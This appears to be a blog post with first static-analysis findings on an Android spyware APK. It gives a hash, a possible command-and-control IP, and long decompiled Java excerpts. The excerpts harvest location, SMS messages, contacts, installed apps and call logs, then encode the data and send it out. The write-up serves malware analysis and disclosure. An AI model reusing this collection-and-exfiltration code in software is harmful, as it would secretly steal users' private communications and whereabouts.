Cyber Merchants of DeathRussian Malware Write-up First Findings
Russian Malware Write-up First Findings
TLDR
MD5 6f7523d3019fa190499f327211e01fcb
Possible C&C: http://69.90.132.215/
Tweet that started this: https://twitter.com/DAlperovitch/status/811800231377510400
Functionality
This is a quick write up regarding preliminary findings of the APK crowdstrike tweeted about. The apks that I’ve been able to get my hands on have been unable to install. These finds are based on static analysis of the classes.dex files. Special thanks to Patrick Wardle, and Tim Strazzere,
location data
if(((TelephonyManager)v23).getPhoneType() == 1) {
v16 = ((TelephonyManager)v23).getCellLocation();
if(v16 != null) {
v21 = "LAC: " + ((GsmCellLocation)v16).getLac() + ", " + "CID: " + ((GsmCellLocation)v16).getCid();
}
v24 = "GSM";
}
if(((TelephonyManager)v23).getPhoneType() == 2) {
v16 = ((TelephonyManager)v23).getCellLocation();
if(v16 != null) {
v8 = ((CdmaCellLocation)v16).getBaseStationId();
v7 = ((CdmaCellLocation)v16).getBaseStationLongitude();
v6 = ((CdmaCellLocation)v16).getBaseStationLatitude();
}
v21 = "Base Station Id: " + v8 + ", " + "Base Station Longitude: " + v7 + ", " + "Base Station Latitude: " + v6;
v24 = "CDMA";
}
int v10 = ((TelephonyManager)v23).getSimState();
String v17 = ((TelephonyManager)v23).getSimCountryIso();
String v22 = v10 == 5 ? ((TelephonyManager)v23).getSimOperator() : "unknown";
grabbing SMS history
label_29:
while(v39 < v30.getCount()) {
String v21 = v30.getString(v30.getColumnIndexOrThrow("body")).toString();
String v45 = v30.getString(v30.getColumnIndexOrThrow("address")).toString();
Date v49 = new Date(Long.valueOf(v30.getString(v30.getColumnIndexOrThrow("date")).toString()).longValue());
String v56 = null;
switch(Integer.parseInt(v30.getString(v30.getColumnIndexOrThrow("type")).toString())) {
case 1: {
v56 = "INBOX";
break;
}
case 2: {
v56 = "SENT";
break;
}
case 3: {
v56 = "DRAFT";
break;
}
}
v53.append("<br>Phone Number:--- " + v45 + " <br>Message Type:--- " + v56 + " <br>Message Date:--- " + v49 + " <br>Message Body:--- " + v21);
v53.append("<br>----------------------------------");
v30.moveToNext();
++v39;
}
installed applications
public void GetAppList() {
Boolean v8 = Boolean.valueOf(true);
int v3 = 1;
PackageManager v6 = this.getPackageManager();
List v1 = v6.getInstalledApplications(0);
ArrayList v5 = new ArrayList();
String v7 = String.valueOf(String.valueOf("<pre><font size=4 color=green><br>CMD 106 success</font>") + "<font size=4 color=blue>") + "<br>";
Iterator v10 = v1.iterator();
while(v10.hasNext()) {
Object v0 = v10.next();
if((((ApplicationInfo)v0).flags & 128) == 1) {
((List)v5).add(v0);
continue;
}
if((((ApplicationInfo)v0).flags & 1) == 1) {
if(v8.booleanValue()) {
continue;
}
((List)v5).add(v0);
v7 = String.valueOf(v7) + "System App " + v3 + ": " + v6.getApplicationLabel(((ApplicationInfo)v0)) + "( " + ((ApplicationInfo)v0).packageName + " )" + " ";
++v3;
continue;
}
((List)v5).add(v0);
v7 = String.valueOf(v7) + "App " + v3 + ": " + v6.getApplicationLabel(((ApplicationInfo)v0)) + "( " + ((ApplicationInfo)v0).packageName + " )" + " ";
++v3;
}
new ReqP(((Context)this), 100, new String(Base64.encode(String.valueOf(v7) + "</font></pre>".getBytes(), 0))).execute(new String[0]);
this.stopSelf();
}
Grabbing contacts
public void fetchContacts() {
Uri v3 = ContactsContract$Contacts.CONTENT_URI;
String v19 = "_id";
String v12 = "display_name";
String v15 = "has_phone_number";
Uri v17 = ContactsContract$CommonDataKinds$Phone.CONTENT_URI;
String v18 = "contact_id";
String v16 = "data1";
Uri v14 = ContactsContract$CommonDataKinds$Email.CONTENT_URI;
String v13 = "contact_id";
String v11 = "data1";
StringBuffer v28 = new StringBuffer();
ContentResolver v2 = this.getContentResolver();
Cursor v22 = v2.query(v3, null, null, null, null);
Boolean v10 = Boolean.valueOf(false);
if(v22.moveToFirst()) {
v10 = Boolean.valueOf(true);
}
if(v10.booleanValue()) {
if(v22.getCount() <= 0) {
goto label_124;
}
do {
String v21 = v22.getString(v22.getColumnIndex(v19));
String v27 = v22.getString(v22.getColumnIndex(v12));
if(Integer.parseInt(v22.getString(v22.getColumnIndex(v15))) > 0) {
v28.append("<br>Name: " + v27);
Cursor v29 = v2.query(v17, null, String.valueOf(v18) + " = ?", new String[]{v21}, null);
while(v29.moveToNext()) {
v28.append("<br>Phone number: " + v29.getString(v29.getColumnIndex(v16)));
}
v29.close();
Cursor v25 = v2.query(v14, null, String.valueOf(v13) + " = ?", new String[]{v21}, null);
while(v25.moveToNext()) {
v28.append("<br>E-mail: " + v25.getString(v25.getColumnIndex(v11)));
}
v25.close();
v28.append("<br>");
}
}
while(v22.moveToNext());
new ReqP(this, 100, new String(Base64.encode(String.valueOf("<pre><font size=4 color=green><br>CMD 104 success</font>") + "<font size=4 color=blue><br>" + v28 + "</font></pre>".getBytes(), 0))).execute(new String[0]);
this.stopSelf();
}
else {
new ReqP(this, 100, new String(Base64.encode(String.valueOf("<pre><font size=4 color=green><br>CMD 104 success</font>") + "<font size=4 color=red><br>NO CONTACTS !!!</font></pre>".getBytes(), 0))).execute(new String[0]);
this.stopSelf();
}
label_124:
if(v22 != null) {
v22.close();
}
}
Call History/ Logs
private void getCallDetails() {
String v22 = "<pre><font size=4 color=green><br>CMD 102 success</font>";
StringBuffer v21 = new StringBuffer();
Cursor v18 = this.getContentResolver().query(CallLog$Calls.CONTENT_URI, null, null, null, null);
int v19 = v18.getColumnIndex("number");
int v23 = v18.getColumnIndex("type");
int v14 = v18.getColumnIndex("date");
int v17 = v18.getColumnIndex("duration");
v21.append("<br>***************Call Log*************** :");
while(v18.moveToNext()) {
String v20 = v18.getString(v19);
String v12 = v18.getString(v23);
Date v10 = new Date(Long.valueOf(v18.getString(v14)).longValue());
String v11 = v18.getString(v17);
String v15 = null;
switch(Integer.parseInt(v12)) {
case 1: {
v15 = "INCOMING";
break;
}
case 2: {
v15 = "OUTGOING";
break;
}
case 3: {
v15 = "MISSED";
break;
}
}
v21.append("<br>Phone Number:--- " + v20 + "<br>Call Type:--- " + v15 + "<br>Call Date:--- " + v10 + "<br>Call duration in sec :--- " + v11);
v21.append("<br>----------------------------------");
}
v18.close();
new ReqP(this, 100, new String(Base64.encode(String.valueOf(v22) + v21 + "</pre>".getBytes(), 0))).execute(new String[0]);
this.stopSelf();